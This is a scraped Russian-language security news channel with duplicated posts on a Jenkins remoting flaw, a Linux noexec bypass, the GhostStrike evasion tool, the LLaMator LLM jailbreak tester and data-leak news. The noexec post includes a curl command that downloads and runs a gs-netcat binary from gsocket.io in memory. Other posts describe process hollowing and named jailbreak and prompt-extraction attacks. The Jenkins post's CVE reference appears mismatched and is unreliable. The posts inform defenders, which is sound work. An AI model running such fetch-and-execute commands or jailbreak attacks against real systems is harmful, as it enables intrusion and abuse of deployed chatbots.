Эксплойт использует доступ к классу hudson.remoting.RemoteClassLoader, который отвечает за загрузку классов через удалённые узлы. Агенты могут воспользоваться этой уязвимостью через fetchJar, что даёт им возможность удалённого выполнения кода (RCE) или получения доступа к конфиденциальным данным.
🔧 Патч и защита
Для устранения уязвимости разработчики ввели валидатор и несколько системных свойств Java. Например:
- jenkins.security.s2m.JarURLValidatorImpl.REJECT_ALL — блокирует любые попытки загрузки JAR-файлов.
- hudson.remoting.Channel.DISABLE_JAR_URL_VALIDATOR — отключает проверку валидности URL.
Валидатор проверяет, соответствует ли запрашиваемый JAR-файл допустимым плагинам или файлам ядра. Полный текст изменений можно найти в репозитории Jenkins на GitHub.
⚠️ Риски и эксплуатация
Для реализации атаки злоумышленнику потребуется доступ к агентам Jenkins. Это может быть достигнуто через компрометированные учетные данные или прямое подключение к процессам агента.
Способы эксплуатации включают:
- Использование секрета агента для подключения к контроллеру Jenkins;
- Подключение к уже работающему процессу Remoting через Java API.
Этот недостаток также может быть использован для получения удалённого выполнения кода (RCE), что подтверждается ещё одной рекомендацией, выпущенной ранее в 2024 году. Подробнее о RCE можно прочитать в отчёте CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Jenkins #уязвимость #информационнаябезопасность #CVE2024
🚨 Новые навыки в кибербезопасности: спрос на специалистов в области LLM и ML растёт
В 2024 году всё больше организаций осознают важность защиты своих активов от угроз, связанных с искусственным интеллектом. Согласно отчёту ISACA, около 24% опрошенных назвали навыки в области LLM SecOps и ML SecOps одними из самых серьёзных пробелов в кибербезопасности.
🔑 Что такое LLM SecOps и ML SecOps? ML SecOps — это процесс интеграции безопасности на всех этапах разработки и развёртывания систем машинного обучения. Фреймворк включает в себя защиту данных, используемых для обучения моделей, предотвращение искажений, а также применение стандартных мер безопасности, таких как безопасное кодирование, моделирование угроз и реагирование на инциденты.
LLM SecOps охватывает весь жизненный цикл крупных языковых моделей, начиная с подготовки данных и заканчивая реагированием на инциденты. Этот процесс включает такие аспекты, как этическая оценка на этапе разработки, очистка обучающих данных, предотвращение создания вредоносного контента, мониторинг модели после её развертывания и цензоринг.
📚 Где можно обучиться этим навыкам? Для специалистов по безопасности появляются новые ресурсы и курсы. Например, Benjamin Kereopa-Yorke, старший специалист по безопасности и исследователь в области AI, поддерживает репозиторий на GitHub с ресурсами и тренингами по ML SecOps. Также OWASP подготовил проекты Machine Learning Security Top Ten и OWASP Top Ten для LLM, описывающие, как предотвращать атаки на ML-системы и защищать LLM от угроз, таких как утечка данных или кража моделей.
🌐 Прочие ключевые навыки кибербезопасности Помимо навыков в ML и LLM, компании всё чаще ищут специалистов с опытом в облачных технологиях (42%), а также в области реализации мер безопасности (35%) и разработки программного обеспечения (28%). С увеличением числа рабочих нагрузок, перемещаемых в облако, важность защиты облачных активов становится всё более очевидной.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LLM #ML #информационнаябезопасность #SecOps #ISACA
В 2024 году всё больше организаций осознают важность защиты своих активов от угроз, связанных с искусственным интеллектом. Согласно отчёту ISACA, около 24% опрошенных назвали навыки в области LLM SecOps и ML SecOps одними из самых серьёзных пробелов в кибербезопасности.
🔑 Что такое LLM SecOps и ML SecOps? ML SecOps — это процесс интеграции безопасности на всех этапах разработки и развёртывания систем машинного обучения. Фреймворк включает в себя защиту данных, используемых для обучения моделей, предотвращение искажений, а также применение стандартных мер безопасности, таких как безопасное кодирование, моделирование угроз и реагирование на инциденты.
LLM SecOps охватывает весь жизненный цикл крупных языковых моделей, начиная с подготовки данных и заканчивая реагированием на инциденты. Этот процесс включает такие аспекты, как этическая оценка на этапе разработки, очистка обучающих данных, предотвращение создания вредоносного контента, мониторинг модели после её развертывания и цензоринг.
📚 Где можно обучиться этим навыкам? Для специалистов по безопасности появляются новые ресурсы и курсы. Например, Benjamin Kereopa-Yorke, старший специалист по безопасности и исследователь в области AI, поддерживает репозиторий на GitHub с ресурсами и тренингами по ML SecOps. Также OWASP подготовил проекты Machine Learning Security Top Ten и OWASP Top Ten для LLM, описывающие, как предотвращать атаки на ML-системы и защищать LLM от угроз, таких как утечка данных или кража моделей.
🌐 Прочие ключевые навыки кибербезопасности Помимо навыков в ML и LLM, компании всё чаще ищут специалистов с опытом в облачных технологиях (42%), а также в области реализации мер безопасности (35%) и разработки программного обеспечения (28%). С увеличением числа рабочих нагрузок, перемещаемых в облако, важность защиты облачных активов становится всё более очевидной.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LLM #ML #информационнаябезопасность #SecOps #ISACA
⚠️ Обход флага noexec в Linux: критическая уязвимость ⚠️
Исследователи обнаружили способ обхода флага noexec в Linux, который позволяет запускать произвольные бинарные файлы на разделах, где выполнение запрещено. Этот метод использует скрипты на Perl, Bash и PHP, не требуя прав root, и позволяет загружать и исполнять файлы напрямую из интернета, обходя ограничения.
🔑 Как работает уязвимость?
Секрет заключается в том, что бинарный файл не нужно помечать как исполняемый, и он может находиться на разделе с активным флагом noexec. Это особенно критично, если все доступные для записи разделы смонтированы с параметром -o noexec, включая /dev/shm. Метод работает даже в средах, где PHP ограничен в использовании функции 'exec'.
💻 Технические детали
Решение базируется на инъекции shellcode в работающий процесс через системные вызовы memfd_create и execveat, что позволяет загрузить бинарный файл из оперативной памяти. Метод успешно работает даже в условиях, когда системные вызовы в Bash и PHP заблокированы.
Пример выполнения команды 'id' на Perl:
Аналогично для Bash:
📡 Загрузка и исполнение файлов из интернета
Одним из опасных аспектов метода является возможность загрузки и выполнения файлов напрямую из сети, минуя ограничения noexec. Это может использоваться злоумышленниками для скрытого запуска вредоносного ПО, например:
🚨 Влияние на безопасность
Метод представляет серьёзную угрозу для систем, которые полагаются на флаг noexec для защиты от исполнения кода. Специалисты рекомендуют усилить контроль за доступом к системным вызовам и ограничить их использование, особенно в критически важных средах.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Linux #noexec #уязвимость #информационнаябезопасность
Исследователи обнаружили способ обхода флага noexec в Linux, который позволяет запускать произвольные бинарные файлы на разделах, где выполнение запрещено. Этот метод использует скрипты на Perl, Bash и PHP, не требуя прав root, и позволяет загружать и исполнять файлы напрямую из интернета, обходя ограничения.
🔑 Как работает уязвимость?
Секрет заключается в том, что бинарный файл не нужно помечать как исполняемый, и он может находиться на разделе с активным флагом noexec. Это особенно критично, если все доступные для записи разделы смонтированы с параметром -o noexec, включая /dev/shm. Метод работает даже в средах, где PHP ограничен в использовании функции 'exec'.
💻 Технические детали
Решение базируется на инъекции shellcode в работающий процесс через системные вызовы memfd_create и execveat, что позволяет загрузить бинарный файл из оперативной памяти. Метод успешно работает даже в условиях, когда системные вызовы в Bash и PHP заблокированы.
Пример выполнения команды 'id' на Perl:
source memexec-perl.sh
cat /usr/bin/id | memexec -u
Аналогично для Bash:
source memexec-bash.sh
cat /usr/bin/id | memexec
📡 Загрузка и исполнение файлов из интернета
Одним из опасных аспектов метода является возможность загрузки и выполнения файлов напрямую из сети, минуя ограничения noexec. Это может использоваться злоумышленниками для скрытого запуска вредоносного ПО, например:
curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | perl -e 'for(319,279){...}'🚨 Влияние на безопасность
Метод представляет серьёзную угрозу для систем, которые полагаются на флаг noexec для защиты от исполнения кода. Специалисты рекомендуют усилить контроль за доступом к системным вызовам и ограничить их использование, особенно в критически важных средах.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Linux #noexec #уязвимость #информационнаябезопасность
🤖 Мультиагентные системы для автономной киберзащиты
С ростом количества кибератак, необходимость в автономных и адаптивных системах защиты становится всё более актуальной. Исследователи предложили новый подход для повышения эффективности таких систем — использование мультиагентного глубокого обучения с подкреплением (MADRL). Данный метод позволяет агентам работать совместно для обнаружения и нейтрализации киберугроз, создавая тем самым более устойчивые системы.
🔑 Что такое MADRL и как это работает? MADRL — это технология, основанная на алгоритмах Actor-Critic, которая комбинирует стратегическое планирование (actor) и оценку состояния системы (critic). В мультиагентных системах каждый агент отвечает за свою область защиты, при этом агенты могут обмениваться информацией, работая над общей целью — максимальной защитой сети. Система автоматически распознает аномалии, атакующие действия и применяет меры для их устранения.
🛡️ Преимущества мультиагентного подхода
- Совместное обучение: агенты могут одновременно защищать разные части сети, что делает защиту более гибкой и масштабируемой.
- Автономное принятие решений: каждый агент обучается реагировать на угрозы в реальном времени без необходимости вмешательства человека.
- Адаптивность: система MADRL может самостоятельно подстраиваться под новые сценарии атак, улучшая свою эффективность с каждым новым взаимодействием.
💡 Практическое применение Исследования показывают, что мультиагентные системы могут значительно улучшить уровень защиты сетей, особенно в крупных организациях с разветвлённой инфраструктурой. Например, в модели тестовой сети, разделённой на сегменты (включая зоны повышенной безопасности и публичный доступ), агенты MADRL эффективно защищали критические узлы и предотвращали атаки на ранних стадиях.
📊 Результаты исследований В ходе испытаний мультиагентные системы показали высокую способность к быстрому обучению и адаптации к меняющимся угрозам. Использование алгоритмов PPO и A2C в этих системах дало значительные результаты: автономные агенты не только защищали сеть, но и помогали снижать количество ложных срабатываний, что всегда было проблемой для традиционных систем кибербезопасности.
📈 Перспективы
Новый подход открывает дверь к созданию более интеллектуальных систем киберзащиты, способных не только обнаруживать и устранять угрозы, но и самостоятельно обучаться на основе полученного опыта. Это будущее кибербезопасности, где системы смогут защищать себя без необходимости постоянного контроля со стороны человека.
🔗 Более подробно про MADRL можно прочитать в научном исследовании.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #AI #ML #MADRL #информационнаябезопасность #автономныесистемы
С ростом количества кибератак, необходимость в автономных и адаптивных системах защиты становится всё более актуальной. Исследователи предложили новый подход для повышения эффективности таких систем — использование мультиагентного глубокого обучения с подкреплением (MADRL). Данный метод позволяет агентам работать совместно для обнаружения и нейтрализации киберугроз, создавая тем самым более устойчивые системы.
🔑 Что такое MADRL и как это работает? MADRL — это технология, основанная на алгоритмах Actor-Critic, которая комбинирует стратегическое планирование (actor) и оценку состояния системы (critic). В мультиагентных системах каждый агент отвечает за свою область защиты, при этом агенты могут обмениваться информацией, работая над общей целью — максимальной защитой сети. Система автоматически распознает аномалии, атакующие действия и применяет меры для их устранения.
🛡️ Преимущества мультиагентного подхода
- Совместное обучение: агенты могут одновременно защищать разные части сети, что делает защиту более гибкой и масштабируемой.
- Автономное принятие решений: каждый агент обучается реагировать на угрозы в реальном времени без необходимости вмешательства человека.
- Адаптивность: система MADRL может самостоятельно подстраиваться под новые сценарии атак, улучшая свою эффективность с каждым новым взаимодействием.
💡 Практическое применение Исследования показывают, что мультиагентные системы могут значительно улучшить уровень защиты сетей, особенно в крупных организациях с разветвлённой инфраструктурой. Например, в модели тестовой сети, разделённой на сегменты (включая зоны повышенной безопасности и публичный доступ), агенты MADRL эффективно защищали критические узлы и предотвращали атаки на ранних стадиях.
📊 Результаты исследований В ходе испытаний мультиагентные системы показали высокую способность к быстрому обучению и адаптации к меняющимся угрозам. Использование алгоритмов PPO и A2C в этих системах дало значительные результаты: автономные агенты не только защищали сеть, но и помогали снижать количество ложных срабатываний, что всегда было проблемой для традиционных систем кибербезопасности.
📈 Перспективы
Новый подход открывает дверь к созданию более интеллектуальных систем киберзащиты, способных не только обнаруживать и устранять угрозы, но и самостоятельно обучаться на основе полученного опыта. Это будущее кибербезопасности, где системы смогут защищать себя без необходимости постоянного контроля со стороны человека.
🔗 Более подробно про MADRL можно прочитать в научном исследовании.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #AI #ML #MADRL #информационнаябезопасность #автономныесистемы
👍1
🛠️ GhostStrike: Инструмент для этичного хакинга
GhostStrike — продвинутый инструмент с открытым исходным кодом, предназначенный для "этичных взломов" и задач Red Team. Решение использует современные подходы для скрытного обхода защитных механизмов Windows, что делает его весьма полезным для pen-тестов и оценки безопасности.
💡 Основные возможности GhostStrike:
- Использование хеш-методов для динамического разрешения Windows API, чтобы избежать обнаружения сигнатурными системами безопасности.
- Шифрование и расшифровка shellcode для его сокрытия в памяти и усложнения статического анализа.
- Создание защищённых ключей с помощью Windows Cryptography API для шифрования и расшифровки shellcode.
- Простое, но эффективное шифрование XOR для защиты shellcode в процессе инъекции.
- Сокрытие путь выполнения, чтобы усложнить анализ для статических и динамических инструментов.
- Внедрение зашифрованного shellcode в легитимные процессы Windows, такие как explorer.exe, для скрытого исполнения кода.
🔍 Зачем нужен GhostStrike? Инструмент демонстрирует одну из наиболее распространённых техник инъекции — процесс холловинга. GhostStrike позволяет внедрять вредоносный код Sliver в различные процессы Windows для тестирования безопасности без необходимости в привилегиях администратора.
👨💻 Создатель инструмента, Стивен Майорга, планирует добавить поддержку других фреймворков управления и контроля, таких как Cobalt Strike, Havoc, Covenant и Empire.
⚠️ Важно!
GhostStrike предназначен исключительно для образовательных целей и работы в контролируемых средах. Несанкционированное использование за пределами этих условий запрещено.
🔗 Инструмент доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #GhostStrike #RedTeam #информационнаябезопасность #этичныйхакинг
GhostStrike — продвинутый инструмент с открытым исходным кодом, предназначенный для "этичных взломов" и задач Red Team. Решение использует современные подходы для скрытного обхода защитных механизмов Windows, что делает его весьма полезным для pen-тестов и оценки безопасности.
💡 Основные возможности GhostStrike:
- Использование хеш-методов для динамического разрешения Windows API, чтобы избежать обнаружения сигнатурными системами безопасности.
- Шифрование и расшифровка shellcode для его сокрытия в памяти и усложнения статического анализа.
- Создание защищённых ключей с помощью Windows Cryptography API для шифрования и расшифровки shellcode.
- Простое, но эффективное шифрование XOR для защиты shellcode в процессе инъекции.
- Сокрытие путь выполнения, чтобы усложнить анализ для статических и динамических инструментов.
- Внедрение зашифрованного shellcode в легитимные процессы Windows, такие как explorer.exe, для скрытого исполнения кода.
🔍 Зачем нужен GhostStrike? Инструмент демонстрирует одну из наиболее распространённых техник инъекции — процесс холловинга. GhostStrike позволяет внедрять вредоносный код Sliver в различные процессы Windows для тестирования безопасности без необходимости в привилегиях администратора.
👨💻 Создатель инструмента, Стивен Майорга, планирует добавить поддержку других фреймворков управления и контроля, таких как Cobalt Strike, Havoc, Covenant и Empire.
⚠️ Важно!
GhostStrike предназначен исключительно для образовательных целей и работы в контролируемых средах. Несанкционированное использование за пределами этих условий запрещено.
🔗 Инструмент доступен на GitHub.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #GhostStrike #RedTeam #информационнаябезопасность #этичныйхакинг
💼 Произойдет ли снижение штрафов за утечки данных?
Снижение штрафов за утечки персональных данных вызывает серьёзные разногласия. Разработчики законопроекта, предусматривающего штрафы до 500 миллионов рублей за инциденты с утечками, выступают против смягчения мер, заявляя, что это ослабит всю инициативу. В то же время бизнес-сообщество предлагает учесть смягчающие обстоятельства, чтобы частично снизить или избежать наказаний.
С начала 2024 года в открытом доступе оказалось около полумиллиарда записей с данными россиян, как сообщил глава Комитета Госдумы по информационной политике Александр Хинштейн. Он является одним из авторов законопроекта, который включает серьёзные санкции, в том числе оборотные штрафы, зависящие от доходов компаний. В настоящее время обсуждаются поправки, включая предложение Минэкономразвития, которое основывается на мнениях представителей бизнеса.
📉 Минэкономразвития предлагает снизить размер штрафов для юридических лиц: до 1,5-2 миллионов рублей за утечки данных от одной до десяти тысяч человек и до 3-5 миллионов рублей при утечке данных более 100 тысяч человек. Однако оборотные штрафы за повторные нарушения останутся, но с уменьшением максимальной суммы до 50 миллионов рублей.
🚨 Реакция на предложение Александр Хинштейн считает, что такое смягчение штрафов неэффективно. По его словам, без осознания ответственности операторами данных никаких улучшений не произойдёт. «Если штрафы будут низкими, компаниям дешевле будет платить штрафы, чем инвестировать в безопасность», — добавил он.
💡 Крупные компании давно критикуют законопроект за высокие штрафы. Однако многие эксперты согласны с тем, что серьёзные санкции необходимы для стимулирования бизнеса к улучшению защиты данных. В «Ассоциации больших данных» считают, что нужно уточнить состав правонарушений и предложили другие меры, которые могут мотивировать компании усиливать защиту.
📊 В условиях кибервойны не все компании могут самостоятельно обеспечить защиту персональных данных. Среди обсуждаемых предложений — создание доверенных операторов, которые будут помогать хранить и защищать данные для компаний, не имеющих соответствующей инфраструктуры.
Окончательное решение по законопроекту и возможным поправкам ожидается до конца 2024 года.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #персональныеданные #законопроект #информационнаябезопасность #утечкаданных
Снижение штрафов за утечки персональных данных вызывает серьёзные разногласия. Разработчики законопроекта, предусматривающего штрафы до 500 миллионов рублей за инциденты с утечками, выступают против смягчения мер, заявляя, что это ослабит всю инициативу. В то же время бизнес-сообщество предлагает учесть смягчающие обстоятельства, чтобы частично снизить или избежать наказаний.
С начала 2024 года в открытом доступе оказалось около полумиллиарда записей с данными россиян, как сообщил глава Комитета Госдумы по информационной политике Александр Хинштейн. Он является одним из авторов законопроекта, который включает серьёзные санкции, в том числе оборотные штрафы, зависящие от доходов компаний. В настоящее время обсуждаются поправки, включая предложение Минэкономразвития, которое основывается на мнениях представителей бизнеса.
📉 Минэкономразвития предлагает снизить размер штрафов для юридических лиц: до 1,5-2 миллионов рублей за утечки данных от одной до десяти тысяч человек и до 3-5 миллионов рублей при утечке данных более 100 тысяч человек. Однако оборотные штрафы за повторные нарушения останутся, но с уменьшением максимальной суммы до 50 миллионов рублей.
🚨 Реакция на предложение Александр Хинштейн считает, что такое смягчение штрафов неэффективно. По его словам, без осознания ответственности операторами данных никаких улучшений не произойдёт. «Если штрафы будут низкими, компаниям дешевле будет платить штрафы, чем инвестировать в безопасность», — добавил он.
💡 Крупные компании давно критикуют законопроект за высокие штрафы. Однако многие эксперты согласны с тем, что серьёзные санкции необходимы для стимулирования бизнеса к улучшению защиты данных. В «Ассоциации больших данных» считают, что нужно уточнить состав правонарушений и предложили другие меры, которые могут мотивировать компании усиливать защиту.
📊 В условиях кибервойны не все компании могут самостоятельно обеспечить защиту персональных данных. Среди обсуждаемых предложений — создание доверенных операторов, которые будут помогать хранить и защищать данные для компаний, не имеющих соответствующей инфраструктуры.
Окончательное решение по законопроекту и возможным поправкам ожидается до конца 2024 года.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #персональныеданные #законопроект #информационнаябезопасность #утечкаданных
🚀 LLaMator: инструмент для тестирования уязвимостей LLM
Команда студентов ИТМО создала фреймворк LLaMator, который победил на хакатоне AI Product Hack в кейсе от компании Raft. Его основная задача — выявление уязвимостей в больших языковых моделях (LLM) на русском языке.
💡 Команда LLaMaстеры сосредоточилась на тестировании именно русскоязычных чат-ботов, так как существующие решения для проверки безопасности, такие как Garak, PyRIT и Giskard, не адаптированы к региональной специфике. Фреймворк LLaMator был построен на базе ps-fuzz, но претерпел значительные изменения для поддержки более сложных сценариев атак.
📊 LLaMator работает через взаимодействие с тестируемым агентом (LLM) и атакующей моделью. Входные параметры включают API-креды, описание модели и системный промт. Атакующая модель генерирует тестовые сценарии на основе заранее подготовленных шаблонов ( AIM jailbreak, Amnesia, Base64 Injection), и оценивает, как чат-бот справляется с ними. На выходе создается отчет с подробным анализом диалогов, выявленных уязвимостей и ошибок.
📌 Основные типы атак:
- AIM Jailbreak: тестирование обхода этических ограничений модели.
- Base64 Injection: внедрение вредоносных строк через base64-кодирование.
- Do Anything Now (DAN): проверка выполнения запрещенных действий.
- System Prompt Stealer: попытка извлечь системные промты LLM.
🔧 Команда планирует доработать фреймворк и развивать его через LLM Security Lab в ИТМО, создавая более сложные сценарии атак для проверки моделей на устойчивость в реальных условиях. Особое внимание будет уделено тестированию моделей в долгосрочных диалогах.
💡 LLaMator помогает разработчикам и исследователям повысить безопасность LLM, обеспечивая устойчивость моделей к промт-инъекциям, противоречиям и другим формам атак. Это критически важно для предотвращения утечек данных и защиты от манипуляций со стороны злоумышленников.
🔗 Подробная статья про LLaMator представлена на Хабре
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LLM #AI #чатботы #информационнаябезопасность #ИТМО
Команда студентов ИТМО создала фреймворк LLaMator, который победил на хакатоне AI Product Hack в кейсе от компании Raft. Его основная задача — выявление уязвимостей в больших языковых моделях (LLM) на русском языке.
💡 Команда LLaMaстеры сосредоточилась на тестировании именно русскоязычных чат-ботов, так как существующие решения для проверки безопасности, такие как Garak, PyRIT и Giskard, не адаптированы к региональной специфике. Фреймворк LLaMator был построен на базе ps-fuzz, но претерпел значительные изменения для поддержки более сложных сценариев атак.
📊 LLaMator работает через взаимодействие с тестируемым агентом (LLM) и атакующей моделью. Входные параметры включают API-креды, описание модели и системный промт. Атакующая модель генерирует тестовые сценарии на основе заранее подготовленных шаблонов ( AIM jailbreak, Amnesia, Base64 Injection), и оценивает, как чат-бот справляется с ними. На выходе создается отчет с подробным анализом диалогов, выявленных уязвимостей и ошибок.
📌 Основные типы атак:
- AIM Jailbreak: тестирование обхода этических ограничений модели.
- Base64 Injection: внедрение вредоносных строк через base64-кодирование.
- Do Anything Now (DAN): проверка выполнения запрещенных действий.
- System Prompt Stealer: попытка извлечь системные промты LLM.
🔧 Команда планирует доработать фреймворк и развивать его через LLM Security Lab в ИТМО, создавая более сложные сценарии атак для проверки моделей на устойчивость в реальных условиях. Особое внимание будет уделено тестированию моделей в долгосрочных диалогах.
💡 LLaMator помогает разработчикам и исследователям повысить безопасность LLM, обеспечивая устойчивость моделей к промт-инъекциям, противоречиям и другим формам атак. Это критически важно для предотвращения утечек данных и защиты от манипуляций со стороны злоумышленников.
🔗 Подробная статья про LLaMator представлена на Хабре
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LLM #AI #чатботы #информационнаябезопасность #ИТМО
🛡️ Применение глубокого обучения для защиты от APT-угроз
🔍 В новом исследовании, представленном Лондонским университетом, изучается использование глубокого обучения с подкреплением (DRL) для атрибуции атак типа Advanced Persistent Threat (APT). Такие угрозы отличаются сложностью и длительным нахождением в системе, что делает их выявление критически важным для кибербезопасности.
💻 Исследователи использовали 3,500 образцов вредоносного ПО от 12 различных APT-групп, чтобы обучить модель распознавать их поведение. Важную роль в анализе сыграли инструменты Cuckoo Sandbox и VirusTotal, предоставляющие подробные отчеты о действиях вредоносного ПО в системе.
🚀 Точность модели DRL достигла 89,27%, что превосходит результаты традиционных методов, таких как Stochastic Gradient Descent (SGD) и Support Vector Classifier (SVC). Модель смогла эффективно выявлять скрытые угрозы, адаптируясь к новым типам атак.
🔧 В будущем планируется усовершенствование модели и ее интеграция с большими языковыми моделями (LLM) для дальнейшей оптимизации процессов анализа и обучения.
🔗 Подробнее можно прочитать в тексте исследования.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #APT #DeepLearning #DRL #AI #информационнаябезопасность
🔍 В новом исследовании, представленном Лондонским университетом, изучается использование глубокого обучения с подкреплением (DRL) для атрибуции атак типа Advanced Persistent Threat (APT). Такие угрозы отличаются сложностью и длительным нахождением в системе, что делает их выявление критически важным для кибербезопасности.
💻 Исследователи использовали 3,500 образцов вредоносного ПО от 12 различных APT-групп, чтобы обучить модель распознавать их поведение. Важную роль в анализе сыграли инструменты Cuckoo Sandbox и VirusTotal, предоставляющие подробные отчеты о действиях вредоносного ПО в системе.
🚀 Точность модели DRL достигла 89,27%, что превосходит результаты традиционных методов, таких как Stochastic Gradient Descent (SGD) и Support Vector Classifier (SVC). Модель смогла эффективно выявлять скрытые угрозы, адаптируясь к новым типам атак.
🔧 В будущем планируется усовершенствование модели и ее интеграция с большими языковыми моделями (LLM) для дальнейшей оптимизации процессов анализа и обучения.
🔗 Подробнее можно прочитать в тексте исследования.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #APT #DeepLearning #DRL #AI #информационнаябезопасность
🛠️ Aranya: Инструмент для внедрения принципов безопасной разработки
Компания SpiderOak представила свой новый open-source проект Aranya, предназначенный для внедрения концепции "secure by design". Aranya позволяет производителям ПО и устройств интегрировать защиту в свои продукты, снижая зависимость от централизованных решений и упрощая управление безопасностью.
🔐 Основные возможности Aranya:
- Защищённая передача данных и контроль доступа между приложениями, устройствами и сенсорами.
- Минимизация поверхности атак с помощью встроенной системы защиты сообщений и управления доступом.
- Идеально подходит для систем с ограниченными ресурсами и децентрализованных архитектур.
📦 Компоненты Aranya:
- Rust Client Library для простой интеграции защиты в приложения.
- Daemon Process для поддержания консистентности и работы с ядром Aranya.
- Политики безопасности Aranya, которые применяются через специально разработанный язык.
🔗 Проект Aranya доступен на GitHub
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Aranya #OpenSource #безопасность #информационнаябезопасность #SpiderOak
Компания SpiderOak представила свой новый open-source проект Aranya, предназначенный для внедрения концепции "secure by design". Aranya позволяет производителям ПО и устройств интегрировать защиту в свои продукты, снижая зависимость от централизованных решений и упрощая управление безопасностью.
🔐 Основные возможности Aranya:
- Защищённая передача данных и контроль доступа между приложениями, устройствами и сенсорами.
- Минимизация поверхности атак с помощью встроенной системы защиты сообщений и управления доступом.
- Идеально подходит для систем с ограниченными ресурсами и децентрализованных архитектур.
📦 Компоненты Aranya:
- Rust Client Library для простой интеграции защиты в приложения.
- Daemon Process для поддержания консистентности и работы с ядром Aranya.
- Политики безопасности Aranya, которые применяются через специально разработанный язык.
🔗 Проект Aranya доступен на GitHub
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Aranya #OpenSource #безопасность #информационнаябезопасность #SpiderOak
📉 Утечки данных в России: тренды 2024 года
В 2024 году число утечек персональных данных в России снизилось: за девять месяцев зафиксировано 110 инцидентов, что ниже по сравнению с 145 случаями за аналогичный период прошлого года, по данным Роскомнадзора. Наибольший удар пришелся на компании из секторов торговли и услуг.
📈 Тем не менее, объем утекших данных продолжает расти. За первые три квартала в открытом доступе оказалось 286 млн уникальных телефонных номеров и 96 млн электронных адресов. Для сравнения, в 2023 году за аналогичный период было скомпрометировано 213 млн записей.
📊 Сферы с наибольшими утечками:
- Электронная коммерция — 39% инцидентов;
- Медицинские сервисы — 10%;
- Финансовые услуги — 9%;
- Ритейл — 8%.
☎️ Большинство утекших данных составляют телефонные номера. На конец 2023 года число активных SIM-карт в России составило 258 млн. Интересно, что цифра меньше
объема номеров в утечках за 2024 год.
🔐 Как защититься?
- Используйте двухфакторную аутентификацию;
- Устанавливайте сложные уникальные пароли;
- Применяйте защитные решения на всех устройствах.
❗️Несмотря на снижение числа утечек, их последствия остаются серьезными, и важно предпринимать меры для защиты персональных данных.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #утечкиданных #информационнаябезопасность #Роскомнадзор
В 2024 году число утечек персональных данных в России снизилось: за девять месяцев зафиксировано 110 инцидентов, что ниже по сравнению с 145 случаями за аналогичный период прошлого года, по данным Роскомнадзора. Наибольший удар пришелся на компании из секторов торговли и услуг.
📈 Тем не менее, объем утекших данных продолжает расти. За первые три квартала в открытом доступе оказалось 286 млн уникальных телефонных номеров и 96 млн электронных адресов. Для сравнения, в 2023 году за аналогичный период было скомпрометировано 213 млн записей.
📊 Сферы с наибольшими утечками:
- Электронная коммерция — 39% инцидентов;
- Медицинские сервисы — 10%;
- Финансовые услуги — 9%;
- Ритейл — 8%.
☎️ Большинство утекших данных составляют телефонные номера. На конец 2023 года число активных SIM-карт в России составило 258 млн. Интересно, что цифра меньше
объема номеров в утечках за 2024 год.
🔐 Как защититься?
- Используйте двухфакторную аутентификацию;
- Устанавливайте сложные уникальные пароли;
- Применяйте защитные решения на всех устройствах.
❗️Несмотря на снижение числа утечек, их последствия остаются серьезными, и важно предпринимать меры для защиты персональных данных.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #утечкиданных #информационнаябезопасность #Роскомнадзор
🔍 Argus: Инструмент для сбора информации и анализа безопасности
Argus — набор open-source инструментов, созданных для упрощения процессов сбора информации и разведки. Он предоставляет удобный интерфейс, объединяющий модули для анализа сетей, веб-приложений и конфигураций безопасности.
📊 Функциональные модули Argus:
1. Анализ сетей и инфраструктуры:
- Сканирование открытых портов
- Проверка SSL-сертификатов
- Трассировка маршрутов
- Анализ DNS-записей и WHOIS
2. Анализ веб-приложений:
- Определение CMS
- Поиск скрытых файлов и директорий
- Проверка конфиденциальности и безопасности cookies
- Мониторинг производительности сайта
3. Инструменты для безопасности и разведки угроз:
- Проверка на утечки данных
- Сканирование с помощью Shodan и VirusTotal
- Выявление уязвимостей субдоменов
- Оценка угроз фишинга и вредоносного ПО
🛠️ Argus идеально подходит как для исследовательских целей, так и для проведения тестов на проникновение.
🔗 Argus доступен на GitHub
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #кибербезопасность #информационнаябезопасность #openSource #Argus #сборинформации #инструменты
Argus — набор open-source инструментов, созданных для упрощения процессов сбора информации и разведки. Он предоставляет удобный интерфейс, объединяющий модули для анализа сетей, веб-приложений и конфигураций безопасности.
📊 Функциональные модули Argus:
1. Анализ сетей и инфраструктуры:
- Сканирование открытых портов
- Проверка SSL-сертификатов
- Трассировка маршрутов
- Анализ DNS-записей и WHOIS
2. Анализ веб-приложений:
- Определение CMS
- Поиск скрытых файлов и директорий
- Проверка конфиденциальности и безопасности cookies
- Мониторинг производительности сайта
3. Инструменты для безопасности и разведки угроз:
- Проверка на утечки данных
- Сканирование с помощью Shodan и VirusTotal
- Выявление уязвимостей субдоменов
- Оценка угроз фишинга и вредоносного ПО
🛠️ Argus идеально подходит как для исследовательских целей, так и для проведения тестов на проникновение.
🔗 Argus доступен на GitHub
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #кибербезопасность #информационнаябезопасность #openSource #Argus #сборинформации #инструменты